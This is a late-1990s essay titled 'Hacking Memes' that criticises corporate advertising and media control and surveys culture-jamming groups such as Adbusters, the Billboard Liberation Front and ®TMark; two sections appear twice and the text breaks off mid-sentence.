Repetition alone worked in the old days of limited media. When the sources of
information were few and uniform, when there were three networks and one
message. Today's consumers are not only more sophisticated - merely making
them remember is no longer enough - consumers are the battleground for
information wars, with messages flying at them from all directions. Drive down any
city street and look at the images: one in ten (if you're lucky) is an actual traffic
signal; the rest are trying to implant some idea, some behaviour, into your mind.
Advertising today looks for stronger hooks, and it finds them in association and
self-identification. The concept is especially simple: find (or define) a person's
conception of self which is is pleasing. Mold that conception such that the use of a
product or service is essential to that conception. Imprint the idea that in order to
be yourself, you need to purchase such-and-such a brand.
Nike, for example, understands this. After losing market share to Reebok, Nike's
new advertising campaign focussed less and less on shoes and more and more on
image. As Randall Lane explains in a recent Forbes article,
Nike's Phil Knight isn't selling shoes. He's selling attitude....
Nike would sell not shoes but the athletic ideals of determination,
individuality, self-sacrifice and winning....
Nike ads almost never pitch product--or even mention the company's
name. They create a mood, an attitude, and then associate the product
with that mood. Call it image transfer. Cool ads, cool product. As Wieden
puts it: "We don't set out to make ads. The ultimate goal is to make a
connection."
The idea behind Nike's ads is to transfer a sense of identity from the person to the
product.
Hacking Memes
3. The Corporate Pitch
People living in western democracies are flooded with advertising. The illusion is
sustained that they are being offered choice, but in reality, they are being presented
with a uniform message. Western society does not consist of many cultures,
rather, more and more, they are being subsumed into a single culture.
The reality of this hit home for me when I found myself listening to - and enjoying -
Meredith Brooks's recent top 10 song, Bitch I realized I was watching an
advertisement for the movie Practical Magic. Brooks's song - fresh, rebellious,
catchy - was appropriated and incorporated into the larger media package. Indeed,
it seems that most popular music today ties in with a movie or television show -
and that most movies and television shows tie in with additional product lines.
These tie-ins define not only the breadth but also the limits of popular culture. Even
rebellion is commodified - if it is not commodified, it is not shown. 'Culture' in our
society, both from the popular point of view and even in academic studies - means
'mass culture', as defined by the tightly woven network of the mass media meme.
As author and pundit Carrie McLaren complains:
The real disappointment lies in (scholars') abject inability to recognize
'popular culture' anywhere but in the officially-sanctioned showplaces
of corporate America; their utter dependence on television to provide
them with an imagery of rebellion.
Or as Mark Dery observes in his classic essay, Culture Jamming,
Corporate ownership of the newsmedia, the subsumption of an
ever-larger number of publishing companies and television networks
into an ever-smaller number of multinationals, and the increased
privatization of truth by an information-rich, technocratic elite are not
newly-risen issues. More recent is the notion that the public mind is
being colonized by corporate phantasms---wraithlike images of power
and desire that haunt our dreams.
Hacking Memes
4. Hyper Reality
Steve Mizrach, Culture Jamming: The Information War of the 90s:
the French philosopher Baudrillard calls our postmodern existence
"hyperreality." Real experiences and things have been replaced with
simulacra - copies without an original. Due to the power of mass media
advertising, our relationship to the signifier has changed. Now it hides
the absence of a signified: conceals the inability to deliver real
satisfaction by cleverly simulating it. Part of our hyperreal lives is the
fact that our simulations are more real than real. Given a better imitation,
people choose it over the real thing; hence Disney's Matterhorn enjoys
more visitors than the real one in Switzerland. More insidiously, through
various obfuscations, people come to think the simulacrum is the real
McCoy, and forget about the historical and physical reality it represents.
Modern advertising critics like Mark Crispin Miller often note the hidden
messages concealed within the cool graphics and media saturation of
Madison Avenue and MTV. Originally, they suggest, advertising often
connected the product being sold with some sort of self-image or way of
life (pastoral, pleasant, family-oriented.) Often, it was conveyed that the
product would somehow confer various advantages - popularity,
sexiness, fame, success, power, even individuality. Today, ads are filled
with a strange sort of rugged selfishness, misanthropy, and
mean-spiritedness ("touch my doritos and die.") A person is told sternly
to buy as much as they can of the product but never to share with
friends. "Get your own," they're told. While various moral crusaders
seek to combat the various sexual innuendos of TV programming, they
rarely challenge the more subtle but socially disruptive images found in
commercials and other advertising.
The product, no longer able to offer satisfaction on its own ground ("a
potato chip is a chip is a chip"), instead offers the consumer a chance to
be part of a certain 'crowd' or 'scene.' They belong to a cool "product
tribe," revelling in the image and sensibility that the product somehow
mystically confers - the fetishism of commodities, hyperaccelerated for
Generation X. Analysts of postindustrial America suggest this is the
secret hidden within these advertising campaigns - that more and more
people are being sold style, image, and celebrity, since there is no
substance or material satisfaction to the product-in-itself. Concealed
within the jump-cut flash of postmodern advertising is a simple code:
consumption is a mode of transcendence, a way to take part in
something larger than yourself, "the Pepsi Generation."
Corporations utilize various techniques to carve Americans into
various market profiles - not based on what products they use, but on
what media messages they respond to. In other words, they
are to be sold on the images they want to project to themselves and
others, and not on the intrinsic usefulness of consumer items.
Whatever values they supposedly respond to, are translated into
clever pitches, suggesting that the product somehow represents or
embodies those values. Subliminal seduction has never been that
important in advertising, despite the hype, but the use of semiotic
strategies certainly has. Products are often "pitched" to specific ethnic
groups, minorities, or sub-cultures, often using the Marcusian
co-optation strategy of appealing to their own sense of difference or
deviance. ("Wear our clothes, and then you'll be a real rebel.")
Hacking Memes
5. The Information War
Jesse Hirsh:
didn't you hear? they've declared information war against everybody.
yep, that's right, the digital economy is really the perpetual war
economy. Like genesis the great flood is on, only we're the ones being
flooded, or rather bombarded by information, seeking our conversion to
the holy faith of consumerism, otherwise known as virtual reality.
and of course in declaring war the state has identified its enemies and
scapegoats: hackers, phreakers, and anarchists, all of whom are
presumed terrorists.
We tend to think of the media message as pertaining to
products and services only, and to restrict our concept
of the tie-ins to toys, clothing, and running shoes. But
the uniform image being broadcast extends well
beyond consumer purchases; it is devoted to creating
and maintaining the consumer society. No element of life is sacrosanct; all
elements of society are infused.
On the one hand, non-corporate forms of information - any information - are
attacked. In some cases, the strategy is straight-forwardly political. Herbert Schiller,
as quoted by Dery:
The commercialization of information, its private acquisition and sale,
has become a major industry. While more material than ever before, in
formats created for special use, is available at a price, free public
information supported by general taxation is attacked by the private
sector as an unacceptable form of subsidy...An individual's ability to
know the actual circumstances of national and international existence
has progressively diminished.
In Canada and other nations, we see this as the incessant attacks on public
broadcasting networks such as the Canadian Broadcasting Corporation.
On another front, it involves attacking the integrity and
credibility of alternative news sources. A recent
National Post article on the CBC's coverage of
biotechnology is typical. The author, Terence Corcoran,
writes scathingly,
Ideology certainly dominated CBC Radio's
This Morning show yesterday. Reporter Don
Carty is a smooth-talking manipulator of
words who gives his slanted reports a thin
veneer of objectivity.
The corporate culture strives for the middle ground, to portray themselves as
objective and neutral; any position from outside that camp is ridiculed as "biased"
and "political".
Alternatively, public media can be co-opted. Hence, for
example, the sale of the educational Access Network by the
Government of Alberta to the CHUM Media Group. Or the
infiltration of the American Public Broadcasting System by
corporate interests, with - as Carrie McLaren observes,
inevitable results:
In the wake of the Disney/ABC merger, a Young and
Rubicam (huge advertising firm) survey of 8,500 brands
worldwide concluded that the most eligible brand for
acquisition is the Public Broadcasting Service. Surprise,
the home of "educational" programming like Barney and
Nova is one big non-commercial commercial. Says
PBS spokesperson Stu Kantor, "In terms of
differentiation and personal relevance, it is the No. 2
(behind Disney) media brand among the total
population."
The mainstream media's fostering of a sanitary corporate image extends well
beyond news and advertising. Situation comedies, dramas and movies - the
mainstream of 'popular culture' - are plagued with product placement and are
passed through the image scrubber before they air. The NBC's handling of Atomic
Train is typical of the many instances reported by the Student Activists' Network
Wayne Grytting,
After heavily promoting the movie's factual basis, NBC suddenly
changed its mind with "no input" from its parent company, GE, a big
investor in nuclear power. Alerted to the "fact" that nuclear wastes are
not transported by trains, they added a disclaimer emphasizing the
movie's fictional character which they showed at every commercial
break. Then they overdubbed every mention of nuclear waste with the
phrase "hazardous waste", thereby achieving the look of a dubbed
Japanese horror film.
The image of the world that we receive through popular culture - whether in music,
in the cinema, or on television - is a carefully polished version of reality. Mark Dery:
The commercialization of information, its private acquisition and sale,
has become a major industry. While more material than ever before, in
formats created for special use, is available at a price, free public
information supported by general taxation is attacked by the private
sector as an unacceptable form of subsidy...An individual's ability to
know the actual circumstances of national and international existence
has progressively diminished.
As the band Negativeland writes,
It is simply inconceivable that this daily, never ending stream of public
suggestion and desire creation has no effect or influence on our spirits,
our health, our jobs, our laws, our environment, our culture, our political
process, or our national and international policy.
Hacking Memes
6. Control of the Classrooms
The battle extends to all corners of the information nation, even into the sanctity of
the kindergarten classroom. Knowing that repetition and imprinting are key,
advertisers are keen to infuse their message into the curriculum. Advertisers, for
example, recently placed their product in mathematics textbooks.
"This looks like product placement, as they do in the movies," said
David Walsh, director of the National Institute on Media and the Family,
based in Minneapolis, which studies the effect of advertising on families.
"The effect is the same. It gets at what I call the golden rule of influence,
which is when the person being influenced doesn't even know it."
Media groups such as Channel One place television news shows into classrooms.
As they say on their website,
Channel One News is a daily, televised, 10-minute newscast that is
beamed via satellite during the school year to each of the 12,000 schools
in the Channel One Network community. Channel One News features
stories on breaking news and in-depth issues that affect the world, the
nation and specifically America's teenagers.
Leaving aside the question of advertising in education, an examination of what
Channel One considers "news" is revealing. Today's (May 27, 1999) edition asks
students how they liked Star Wars, covered Alannis Morisette, commented on body
image, and reported "Live from Mt. Everest".
The message broadcast to students on Channel One is clear: our culture is defined
by the movies and music we see and hear, our culture is the best, and the best
path to self-actualization is to immerse ourselves in this culture.
Listen to Channel One on freedom in China:
Behind the Chinese government's restrictions are cultural and historical
factors. For thousands of years, Chinese culture has been based on
Confucian values, which people have a respect for authority. The ruler
of the people is a father figure whom everyone must obey. The Chinese
government's existing authoritarian style of leadership follows the
ancient way of emperors who ruled China with "the mandate of
Heaven." Individualism is not highly valued in Confucianism. Instead,
people are encouraged to act in the best interest of the family and
community.
The Chinese culture, according to Channel One, is inherently and irredeemable
evil, based on authortarian "Confucian" values. Such an account misrepresents
both Chinese culture and Confucianism. By contrast, the American culture is
painted in pure tones,
America was founded by English colonists who wanted independence
from Great Britain. The United States also has become a haven for
immigrants fleeing religious and ethnic persecution in other countries.
Because of these historical events, individualism and freedom is highly
valued in American culture.
Here we have not only an assumption of genetic and racial purity, we also have a
conflation of "freedom" and "individualism". And - leaving aside the fact that the
dominant religion in the United States - Christianity - is at least as authoritarian as
Confucianism, the 'fact' of freedom in the United States is traced to its religious
roots.
Advertisers have long known that imprinting is best accomplished though
marketing to kids. The battle for the airwaves and print media has been won. The
battle for the classrooms of the nations is just being engaged.
Hacking Memes
6. Control of the Classrooms
The battle extends to all corners of the information nation, even into the sanctity of
the kindergarten classroom. Knowing that repetition and imprinting are key,
advertisers are keen to infuse their message into the curriculum. Advertisers, for
example, recently placed their product in mathematics textbooks.
"This looks like product placement, as they do in the movies," said
David Walsh, director of the National Institute on Media and the Family,
based in Minneapolis, which studies the effect of advertising on families.
"The effect is the same. It gets at what I call the golden rule of influence,
which is when the person being influenced doesn't even know it."
Media groups such as Channel One place television news shows into classrooms.
As they say on their website,
Channel One News is a daily, televised, 10-minute newscast that is
beamed via satellite during the school year to each of the 12,000 schools
in the Channel One Network community. Channel One News features
stories on breaking news and in-depth issues that affect the world, the
nation and specifically America's teenagers.
Leaving aside the question of advertising in education, an examination of what
Channel One considers "news" is revealing. Today's (May 27, 1999) edition asks
students how they liked Star Wars, covered Alannis Morisette, commented on body
image, and reported "Live from Mt. Everest".
The message broadcast to students on Channel One is clear: our culture is defined
by the movies and music we see and hear, our culture is the best, and the best
path to self-actualization is to immerse ourselves in this culture.
Listen to Channel One on freedom in China:
Behind the Chinese government's restrictions are cultural and historical
factors. For thousands of years, Chinese culture has been based on
Confucian values, which people have a respect for authority. The ruler
of the people is a father figure whom everyone must obey. The Chinese
government's existing authoritarian style of leadership follows the
ancient way of emperors who ruled China with "the mandate of
Heaven." Individualism is not highly valued in Confucianism. Instead,
people are encouraged to act in the best interest of the family and
community.
The Chinese culture, according to Channel One, is inherently and irredeemable
evil, based on authortarian "Confucian" values. Such an account misrepresents
both Chinese culture and Confucianism. By contrast, the American culture is
painted in pure tones,
America was founded by English colonists who wanted independence
from Great Britain. The United States also has become a haven for
immigrants fleeing religious and ethnic persecution in other countries.
Because of these historical events, individualism and freedom is highly
valued in American culture.
Here we have not only an assumption of genetic and racial purity, we also have a
conflation of "freedom" and "individualism". And - leaving aside the fact that the
dominant religion in the United States - Christianity - is at least as authoritarian as
Confucianism, the 'fact' of freedom in the United States is traced to its religious
roots.
Advertisers have long known that imprinting is best accomplished though
marketing to kids. The battle for the airwaves and print media has been won. The
battle for the classrooms of the nations is just being engaged.
Hacking Memes
7. The Counteroffensive: Words as Weapons
The counteroffensive is being mounted by a variety of forces who - until the advent
of the internet - had few means of communication and interaction. The
counteroffensive - an anti-cultural diatribe led by pagans and witches, socialists,
anarchists and libertarians, webgrrls and riotgrrls, homosexuals and lesbians,
environmentalists and consumer advocates - has moved from the trenches of
alternative cafes and billboard defacing to the mainstream of online culture.
The counteroffensive - now armed with the tools of mass media - is a guerilla
operation using the word as weapon, as described by Dery:
The answer lies, perhaps, in the "semiological guerrilla warfare"
imagined by Umberto Eco. "[T]he receiver of the message seems to
have a residual freedom: the freedom to read it in a different way...I am
proposing an action to urge the audience to control the message and its
multiple possibilities of interpretation," he writes. "[O]ne medium can be
employed to communicate a series of opinions on another medium...The
universe of Technological Communication would then be patrolled by
groups of communications guerrillas, who would restore a critical
dimension to passive reception."
Or as the Quebec Public interest Research group puts it,
We can break the homogeneity of the media monopoly by expressing
ourselves with our own media. Taking back our media means taking
back our freedom and engaging in a revolution of many minds against a
common enemy. Through workshops, panel discussions, and lectures,
events such as Liberating Media seek to encourage and inspire
participants to take back our media and our freedom in the diversity of
forms in which they both exist.
The methodology of counterattack involves inserting counter-memes into the
media mainstream. It is the idea of the meme conceived as virus taken to its logical
extreme. This idea expresses itself even in Dawkin's seminary The Selfish Gene
and is operationalized in William S. Burroughs's radical treatise, The Electronic
Revolution:
The control of the mass media depends on laying down lines of
association. When the lines are cut the associational connections are
broken.
I have frequently spoken of word and image as viruses or as acting as
viruses, and this is not an allegorical comparison.
You will notice that this process is continually subject to random
juxtapostation. Just what sign did you see in the Green Park station as
you glanced up from the People? Just who called as you were reading
your letter in the Times? What were you reading when your wife broke a
dish in the kitchen? An unreal paper world and yet completely real
because it is actually happening.
The underground press serves as the only effective counter to a
growing power and more sophisticated technique used by
establishment mass media to falsify, misrepresent, misquote, rule out of
consideration as a priori ridiculous or simply ignore and blot out of
existence: data, books, discoveries that they consider prejudicial to
establishment interest.
Consider the human body and nervous system as unscrambling
devices. Remember that when the human nervous system unscrambles
a scrambled message this will seem to the subject like his very own
ideas which just occurred to him.
Consider now the human voice as a weapon. To what extent can the
unaided human voice duplicate effects that can be done with a tape
recorder? Learning to speak with the mouth shut, thus displacing your
speech, is fairly easy. You can also learn to speak backwards, which is
fairly difficult. I have seen people who can repeat what you are saying
after you and finish at the same time. This is a most disconcerting trick,
particularly when praciticed on a mass scale at a political rally.
Or, as put less eloquently by the Church of the Subgenius:
We're the Happy People. Happy to live in a world of images. Images of
war. Family. Crime. Fun images, that help rinse away unsightly
self-images, so you can get away from the privacy of your own home.
After all, aren't you what everything's here for? You're what we're here
for. That's why we made everything! That's why everything made you.
And that's why you made us. Who are we? Hacking Memes
7. The Counteroffensive: Words as Weapons
The counteroffensive is being mounted by a variety of forces who - until the advent
of the internet - had few means of communication and interaction. The
counteroffensive - an anti-cultural diatribe led by pagans and witches, socialists,
anarchists and libertarians, webgrrls and riotgrrls, homosexuals and lesbians,
environmentalists and consumer advocates - has moved from the trenches of
alternative cafes and billboard defacing to the mainstream of online culture.
The counteroffensive - now armed with the tools of mass media - is a guerilla
operation using the word as weapon, as described by Dery:
The answer lies, perhaps, in the "semiological guerrilla warfare"
imagined by Umberto Eco. "[T]he receiver of the message seems to
have a residual freedom: the freedom to read it in a different way...I am
proposing an action to urge the audience to control the message and its
multiple possibilities of interpretation," he writes. "[O]ne medium can be
employed to communicate a series of opinions on another medium...The
universe of Technological Communication would then be patrolled by
groups of communications guerrillas, who would restore a critical
dimension to passive reception."
Or as the Quebec Public interest Research group puts it,
We can break the homogeneity of the media monopoly by expressing
ourselves with our own media. Taking back our media means taking
back our freedom and engaging in a revolution of many minds against a
common enemy. Through workshops, panel discussions, and lectures,
events such as Liberating Media seek to encourage and inspire
participants to take back our media and our freedom in the diversity of
forms in which they both exist.
The methodology of counterattack involves inserting counter-memes into the
media mainstream. It is the idea of the meme conceived as virus taken to its logical
extreme. This idea expresses itself even in Dawkin's seminary The Selfish Gene
and is operationalized in William S. Burroughs's radical treatise, The Electronic
Revolution:
The control of the mass media depends on laying down lines of
association. When the lines are cut the associational connections are
broken.
I have frequently spoken of word and image as viruses or as acting as
viruses, and this is not an allegorical comparison.
You will notice that this process is continually subject to random
juxtapostation. Just what sign did you see in the Green Park station as
you glanced up from the People? Just who called as you were reading
your letter in the Times? What were you reading when your wife broke a
dish in the kitchen? An unreal paper world and yet completely real
because it is actually happening.
The underground press serves as the only effective counter to a
growing power and more sophisticated technique used by
establishment mass media to falsify, misrepresent, misquote, rule out of
consideration as a priori ridiculous or simply ignore and blot out of
existence: data, books, discoveries that they consider prejudicial to
establishment interest.
Consider the human body and nervous system as unscrambling
devices. Remember that when the human nervous system unscrambles
a scrambled message this will seem to the subject like his very own
ideas which just occurred to him.
Consider now the human voice as a weapon. To what extent can the
unaided human voice duplicate effects that can be done with a tape
recorder? Learning to speak with the mouth shut, thus displacing your
speech, is fairly easy. You can also learn to speak backwards, which is
fairly difficult. I have seen people who can repeat what you are saying
after you and finish at the same time. This is a most disconcerting trick,
particularly when praciticed on a mass scale at a political rally.
Or, as put less eloquently by the Church of the Subgenius:
We're the Happy People. Happy to live in a world of images. Images of
war. Family. Crime. Fun images, that help rinse away unsightly
self-images, so you can get away from the privacy of your own home.
After all, aren't you what everything's here for? You're what we're here
for. That's why we made everything! That's why everything made you.
And that's why you made us. Who are we?
Hacking Memes
8. Humble Beginnings
Forget the names Jerry Rubin and Abbie Hoffman. The prima donna of
underground radicalism is probably Saul Alinsky, whose anti-establishment and
over-the-top forms of guerilla media propelled a wide variety of alternative causes
into 60s mainstream.
As one Amazon reviewer writes,
Mr. Alinsky captures the outrage organizers have with the status quo.
'Why organize?' is the central question that permeates throughout this
book, and Mr. Alinsky answers this question with a scathing attack on
the powers that be, who are beholden to maintaining the status quo. Mr.
Alinsky allows the reader to not just dream of a better America but doles
out powerful, practical methods to either; A. work within the current
system to effect positive change, or B. bring the system to its knees in
the quest toward positive change. An absolute must read for anyone
wishing to take on the status quo of poverty, injustice, hatred, and
discrimination.
If Alinsky had one major rule (other than "shock them") it was: "use their own rules
against them". Consequently, Alinsky followers employed such radical tools as the
court system, community newspapers, and town hall meetings.
Early meme hackers in the Alinsky mold modified that advice only slightly: use
their own words against them.
Thus, for example, the Billboard Liberation Front
modified public advertising to give common
messages a slightly different - and twisted -
meaning. Beginning in 1977 (by dropping the
"M" in "Max Factor they highlighted the
disturbing undertones in that company's slogan,
"A pretty face isn't safe in this city") the BLF
conducted a series of highly visible alterations in
the San Francisco Bay area. The BLF was
followed by many others, for example, POPaganda (Ron English). As the
Apocalyptic Optimism for the End of History (Abrupt) puts it,
Culture Jamming" sticks where rational discourse slides off. It is, simply,
the viral introduction of radical ideas. It is viral in that it uses the enemy's
own resources to replicate iteself -- copy machines, defaced billboards,
web pages. It is radical because--ideally--the message, once deciphered,
causes damage to blind belief. Fake ads, fake newspaper articles,
parodies, pastiche. The best CJ is totally unexpected, surprising,
shocking in its implications.
In a similar vein, Team Seven practised a series of renegade construction activities,
recommending for example to its readers that they raise a flag of your their design
at their local bank after it has closed for the day, or that they set up a reading area
at a predefined other-useage area, such as a car wash or highway media.
The Survival Research Laboratories in San Francisco adopt a more artistic format:
Since its inception SRL has operated as an organization of creative
technicians dedicated to re-directing the techniques, tools, and tenets of
industry, science, and the military away from their typical manifestations
in practicality, product or warfare. Since 1979, SRL has staged over 45
mechanized presentations in the United States and Europe. Each
performance consists of a unique set of ritualized interactions between
machines, robots, and special effects devices, employed in developing
themes of socio-political satire. Humans are present only as audience or
operators.
Meme hacking was limited by technology in the early days. Even Dery could only
identify four major categories:
Sniping and Subvertising (eg. Adbusters)
Media Hoaxing - Joey Skaggs
Audio Agitprop - eg. Sucking Chest Wound, whose God Family Country
ponders mobthink and media bias; The Disposable Heroes of Hiphoprisy,
who take aim in "Television, the Drug of the Nation
Billboard Banditry - eg. Billboard Liberation Front
Adbusters is a Vancouver based anti-advertising magazine. It is perhaps best
known for Buy Nothing Day and TV Turn-Off Week campaigns. In addition to the
monthly magazine, Adbusters attempts to run anti-consumerism advertisements
on mainstream television. The response from the networks is usually negative;
Adbuster's messages are labled "controversial" and banned. Its most recent
campaign, is Economic Progress Killing the Planet - planned for airing during the
G-7 conference in Germany, was rejected by the British Advertising Clearance
Council as unacceptable.
A similar agency is The Centre for Media and
Democracy, which focusses not just on advertising,
but on public relations generally. As the agency's web
site states,
Unlike advertising, public relations is often
hard to recognize. "The best PR is invisible," say
industry insiders. To spin the news in favor of
their clients, PR firms specialize in setting up
phony citizens' groups and scientific "experts"
who spin out contrived research using junk
science.
The Centre's main vehicle, like Adbusters, is a
quarterly magazine, PR Watch, and they have released
two books, Toxic Sludge Is Good For You: Lies, Damn
Lies and the Public Relations Industry (1995) and Mad
Cow USA: Could the Nightmare Happen Here? (1999).
The term Culture Jamming has its origins in the audio agitprop arena, and
specifically, with an experimental-music and art collective known as Negativeland.
They write on their website,
Advertising, especially the high tech seduction and emotional button
pushing going on in national brand advertising, has become a special
subject of interest for Negativland because of its telling view into the
successful manipulation of the mass psyche, and the degree to which it
exploits our common mental environment with the promotion of
personal dissatisfaction and constant desire mongering on a universal
scale.
Other anti-meme artists include The Seemen, "a collaborative of some forty odd art
drop outs and extreme technology inventors who enjoy exploring their taste for the
dark side of applied engineering in robot/kinetic art," and the Cacophony Society,
including the The Los Angeles Cacophony Society and Cacophony Midwest,
which recently launched the First Annual St. Louis Santa Rampage. "The
Cacophony Society is an open network of creative malcontents, guerrilla artists,
slackers, hooligans, kitsch-hounds, and anyone else interested in subverting
primetime reality. You may already be a member!"
Hacking Memes
9. Electronic Warfare
The meme hackers of the 70s and 80s were marginalized. Their reach was limited,
and social commentary following their acts (and subsequent arrests) was
uniformly negative. Society as a whole - so it seemed - branded them as vandals
and anarchists, radicals and communists.
With the advent of the internet in the late 80s and early 90s, meme hacking was
given a new life. While their access to mainstream media was still limited, activists
could now communicate with each other in rapid, free and uncensored messages.
moreover, the internet - and especially the world wide web - gave them a means of
reaching directly into the mainstream consciousness, bypassing the media
altogether.
Early electronic meme hacking consisted of two major tactics: slashing, and
spamming.
Slashing is the appropriation of an existing meme for subcultural purposes. The
term "slashing" derives from pornographic "K/S" - short for "Kirk/Spock" - stories
written by Star Trek fans and published in underground fanzines. The theme
unifying such stories is Kirk and Spock's long homosexual affair - an affair only
alluded to in the on-air version of the series.
The development of 'fan fiction' in general - and more recently, fanzines, fan web
sites, and fan discussion boards - has had the effect of removing control of the
'product' from the corporate studio and into the hands of the general public. Star
Trek, in particular, has been the subject of hundreds of fan pages, and when
Paramount attempted to crack down on the sites (in order to promote its
Microsoft-only version), fans rebelled.
The first subversive spam was probably Joe Matheny's deluge of ascii frogs sent
to the White House (in return for which, he received in good order a deluge of
automated reply messages). Matheny quickly wrote a shell program to filter the
auto-replies and return them to their sender, which set up an email loop. With the
advent of its abuse by more corporate interests (ZDNet and Xoom take note),
spamming has declined as a weapon of choice, revealing as it does a general
disregard for its recipients needs and interests.
An image -
Eduardo Kac led things off with a slide presentation demonstrating how
the Web can become a life source. During his experiment in 1996, people
worldwide where asked to join a teleconference, anytime during a three
week period. The participants simply aimed their cameras to the
heavens so that light on the other end of their transmission could be
used to grow a freshly planted seed, which had been isolated in total
darkness. Through the nourishment of the white lights, the seedling
grew to 18" in height and was later planted outside the Art Institute of
Chicago.
The central question of electronic counterculture revolves around media itself:
who owns it, who controls it, and who uses it. As Jesse Hirsh writes, "We need to
examine the right to communicate, and the communication of our rights." Dery
echoes this theme:
Who will have access to this cornucopia of information, and on what
terms? Will fiber-optic superhighways make stored knowledge
universally available, in the tradition of the public library, or will they
merely facilitate psychological carpet bombing designed to soften up
consumer defenses? And what of the network news? Will it be
superseded by local broadcasts, with their heartwarming (always
"heartwarming") tales of rescued puppies and shocking (always
"shocking") stories of senseless mayhem, mortared together with
airhead banter? Or will the Big Three give way to innumerable news
channels, each a conduit for information about global, national and local
events germane to a specific demographic?
Will cyberpunk telejournalists equipped with Hi-8 video cameras, digital
scanners, and PC-based editing facilities hack their way into legitimate
broadcasts? Or will they, in a medium of almost infinite bandwidth and
channels beyond count, simply be given their own airtime? In short, will
the electronic frontier be wormholed with "temporary autonomous
zones"---Hakim Bey's term for pirate utopias, centrifuges in which social
gravity is artificially suspended---or will it be subdivided and
overdeveloped by what cultural critic Andrew Ross calls "the
military-industrial-media complex?"
The answer lies in the nature of the internet. Everybody will have access to
information. The very nature of cyberspace is that it is interpersonal and
multidirectional. There is no control and - despite the best efforts of the censors -
there is no overseer. We see for the first time the elements of mainstream media on
the retreat, trying to legislate, trying to litigate, trying to appropriate. But as the
nature of cyberspace is communication such efforts will be in vain, for
communication is deeply personal, exactly the opposite of the mass media
message. We see this through concrete examples of anti-meme activities on the
net.
Hacking Memes
10. The Network
The internet is about community. This is a
realization corporate culture realized too late. The
recent received wisdom of electronic commerce
is that to be successful, online advertising must
foster the development of community. But the
countercultural community is already well
established and well entrenched.
Entities such as San Francisco's Laughing Squid
have been using the internet to advertise their
monthly countercultural 'tentacle sessions' for
years now. Alternative 'religions' - such as the
Church of the SubGenius congregate online and
poke fun at mainstream values and culture.
Organizations such as the The center for
Commercial-Free Public Education use the
internet to post messages, coordinate activist
campaigns, and spread information. Activists are able to publicize to each other
the effects of their anti-meme activities, as for example, this post describes the
subversion of a political campaign:
Two weeks ago there was a story that made the headlines in the
newspaper and Compass (PEI's Evening News). The story was that a
pamphlet had been distributed in the riding of Barry Hicken, our Minister
of Environmental Resources. The pamphlet was made to look like a
campaign pamphlet, with pictures of Hicken and the Liberal Party logo. It
stated things like:
-My job has as Minister of Environmental Resources has been very
rewarding. I make over $74,000 a year. My wife still can't believe it.
Please, please, please vote for me. I'll get you a job. I promise.
Agencies such as Tao "organize networks in order to defend and expand public
space and the right to self-determination. (They) create knowledge through
independent public interest research, and distribute it freely through participatory
education." Other sites advise and promote subversive activities. The network is
well entrenched and it's growing; there seems to be no interrupting the flow of
communication.
Online activism also enable people to shelter themselves from the mainstream
culture. One recent tactic is called junk busting, which involves using proxy
software to filter banners, cookies, and mask HTTP header data. A similar initiative
attacks Intel and especially Intel's PSN (Processor Serial Number). And the fictional
identity of Luther Bissett - complete with web site and email address - has been
offered to the community at large for "communication guerrilla actions, hacktivism,
civil disobedience (electronic and not) and radical mythopoesis."
Hacking Memes
11. Web Ad Jamming and Spoof Sites
A wide array of anti-advertsing sites, home page spoofs, and more express more
clearly than any words the sentiments of the anti-meme movement.
Spoof sites have probably existed since the advent of the World Wide Web, but in
recent months their profile - and the litigation against them - has increased. The
dean of corporate spoof sites is probably ®TMark (pronounced 'Art Mark'). Originally
an secretive and underground agency, ®TMark has entered the public arena.
®TMark is the behind the scenes broker of anti-meme mayhem. Projects are
suggested by readers and staff, anonymous donors line up to fund different
projects, and teams of activists carry out the plan. ®TMark prenks have included
switching the voice boxes in G.I. Joe and Barbie dolls, inserting homosexual
couples in Sim Copter Graphics, and online, a scathing spoof site for Shell Oil, and
most recently, a lavish G.W. Bush parody site.
Corporate sites in general are ripe for spoof and parody. Happyclown, Inc. is
an exciting firm devoted to using a fresh and new approach to
Corporate Communications; This young, modern and progressive
Public Relations venture will make the aesthetic sensibilities of the New
Generation available for the use of the familiar and trusted institutions of
the Old Generation.
It is also several other things....
Hole City presents the reader with a sideways
look at media moguls.
"It's a tremendous angle," says
Rupert Murdoch, the media magnate
whose fiery alliance with Satan has
brought him fame, fortune and the Los
Angeles Dodgers. "Our demographics
indicate that Americans respond
positively 53% of the time when we tell
them the truth."
Other anti-corporate sites include Critical Mess Media (CMM), Mess Media's
DisConnection (DisCo), and ZNet Anarchy Watch.
A variation on this theme includes what the Culture Jammer's Enclyclopedia calls
News Trolls:
If there's one thing that the left and the right can agree on, it's that the
news is inaccurate, biased, and is more likely to cement popular
prejudice than to uncover uncomfortable truths. So there's a certain
satisfaction in deliberately planting absurd fiction among all the news
that's fit.
Examples of fiction include the Arm the Homeless campaign, a computer that can
replace judges, and the phoney Detroit gang incident.
In Canada, underground tactics are employed by the Gurilla media - "media
monkeywrenching for British Columbia, Canada" - purveyors of the National Post
parody site and the Conrad Black Envy page:
Finally! A website for all of us who are profoundly envious of the
Blacks-- Conrad and Barbara-- commanders-in-chief of the world's
fastest growing press empire. This site is but a humble attempt to
celebrate the Blacks' words and world: their unpretentious persiflage,
personal pecuniary plentitude, pertinacious pedantry, proprietorial
parsimony, perspicacious pomposity, and polymorphous periphrastic
preeminence.
These and more patently false news sites cause some people to warn that "you
can't trust everything you read on the internet". But their subversion is deeper -
they inform the public that "you can't trust everything you read". No wonder news
agencies and academics want to create "authoritative" web news sources.
Another popular tactic reacts to the increasing commericalization of the web. A
number of sites are creating and propogating spoof web ads. Such ads are meme
hacking at its best - they lay generally ignored (check the top of this page) silently
spreading subversion.
Spoof web ads are available on Positive Propaganda's unsorted banner page, from
Chickenhead, Stay Free! Magazine, Abrupt's Holy War Now by 'Tony Alamo', and
The Corporation's twisted children's companion, Cyberbear.
Hacking Memes
12. The Anti-Meme
The anti-meme is probably typified by the Kitty Porn site. The idea is to take an
existing meme, alter it, and thus show its unreasonable or arbitrary nature. This is
not a new idea - it was practised to great effect by the German philosopher
Friedrich Nietzsche ("the transvaluation of value"). But online, such anti-memes
are able for the first time to gain wide currency.
Consider the spoof Alien Visitors Information Centre.
This travelogue site makes fun of
Chamber-of-Commerce inspired tourist brochures. But
there is a deeper transvaluation:
Kurt Waldheim is one of the large, hairy, upright-walking beasts selected
as their leader though the recent United Nations model for better
campground management. As U.N. secretary-general, Waldheim's
personal greetings were launched in Voyagers 1 and 2, travelling AVIC
kiosks in space which also carry the sounds of chimpanzees
screeching. When we made those decisions, the management did not
